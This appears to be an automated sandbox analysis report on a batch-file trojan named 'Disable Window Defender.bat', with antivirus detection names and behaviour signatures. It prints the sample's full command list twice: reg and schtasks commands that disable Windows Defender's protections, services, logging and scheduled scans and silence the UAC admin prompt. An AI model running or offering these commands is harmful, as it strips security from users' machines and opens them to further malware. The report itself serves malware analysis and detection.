Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 28, 2021, 12:01 p.m. | March 28, 2021, 12:05 p.m. |
-
-
-
reg.exe reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
1304 -
reg.exe reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f
1976 -
reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
1812 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
1760 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
2660 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
2656 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
1032 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
604 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
1468 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
2444 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
1972 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
812 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
2112 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
2312 -
reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
2832 -
reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
1892 -
reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
2948 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
1296 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
2768 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
2840 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
2976 -
schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
1868 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
668 -
reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
2560 -
reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
3032 -
reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
2800 -
reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
2760 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
2724 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
2648 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
2232 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
3104 -
reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
3148
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
section | .sxdata |
packer | Armadillo v1.71 |
file | C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
cmdline | reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t "REG_DWORD" /d 0 /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
cmdline | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
cmdline | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
cmdline | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
cmdline | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
cmdline | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
file | C:\Users\test22\AppData\Local\Temp\7zS6318.tmp\Disable Window Defender.bat |
file | C:\Users\test22\AppData\Local\Temp\7zS6318.tmp |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin |
registry | HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet |
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting | ||||||
description | attempts to modify windows defender policies | registry | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection | ||||||
description | attempts to disable windows defender | registry | HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start |
MicroWorld-eScan | Trojan.GenericKD.36583912 |
ALYac | Trojan.GenericKD.36583912 |
Cylance | Unsafe |
VIPRE | Trojan.Win32.Generic!BT |
AegisLab | Trojan.Win32.Agent.4!c |
Sangfor | Trojan.Win32.Ymacco.AA79 |
K7AntiVirus | Riskware ( 0040eff71 ) |
Alibaba | Trojan:Win32/KillAV.14f7215e |
K7GW | Riskware ( 0040eff71 ) |
Arcabit | Trojan.Generic.D22E39E8 |
ESET-NOD32 | BAT/KillAV.NFF |
Kaspersky | Trojan.Win32.Agent.xahhhi |
BitDefender | Trojan.GenericKD.36583912 |
Avast | FileRepMalware |
Ad-Aware | Trojan.GenericKD.36583912 |
McAfee-GW-Edition | RDN/Generic.dx |
FireEye | Trojan.GenericKD.36583912 |
Emsisoft | Trojan.GenericKD.36583912 (B) |
APEX | Malicious |
Webroot | W32.Malware.Gen |
Avira | BAT/KillAV.gyfuy |
MAX | malware (ai score=80) |
Microsoft | Trojan:Win32/Ymacco.AA79 |
ZoneAlarm | Trojan.Win32.Agent.xahhhi |
GData | Trojan.GenericKD.36583912 |
Cynet | Malicious (score: 90) |
McAfee | RDN/Generic.dx |
VBA32 | Trojan.Wacatac |
Ikarus | Trojan.BAT.KillAV |
Fortinet | BAT/KillAV.NFF!tr |
AVG | FileRepMalware |
Panda | Trj/CI.A |
Qihoo-360 | Win32/Trojan.KillAV.HykCI3wA |
service | WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start) |
service | WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start) |
service | WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start) |
service | WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start) |
service | WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start) |